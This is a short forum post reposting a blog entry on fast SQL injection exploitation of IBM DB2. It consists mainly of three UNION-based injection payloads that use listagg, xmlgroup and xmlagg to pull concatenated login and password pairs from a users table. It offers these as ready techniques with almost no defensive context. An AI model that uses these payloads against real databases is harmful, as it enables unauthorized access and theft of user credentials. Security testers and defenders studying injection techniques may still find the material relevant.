Nytro Posted April 3, 2015 Report Posted April 3, 2015 Fast exploitation method of SQL Injection in IBM DB21. listaggselect * from news where id=-1 union select null,listagg(login||chr(58)||pass,chr(44)) from users(In the first example I use cast function only for good formatted output, but in the second and the third examples cast function is needed for the type conversion)2. xmlgroupselect * from news where id=-1 union select null,cast(xml2clob(xmlgroup(login,pass)) as varchar(180)) from users3. xmlaggselect * from news where id=-1 union select null,cast(xml2clob(xmlagg(xmlrow(login,pass))) as varchar(180)) from usersPosted by dsrbr at 10:02 AMSursa: http://dsrbr.blogspot.ru/ Quote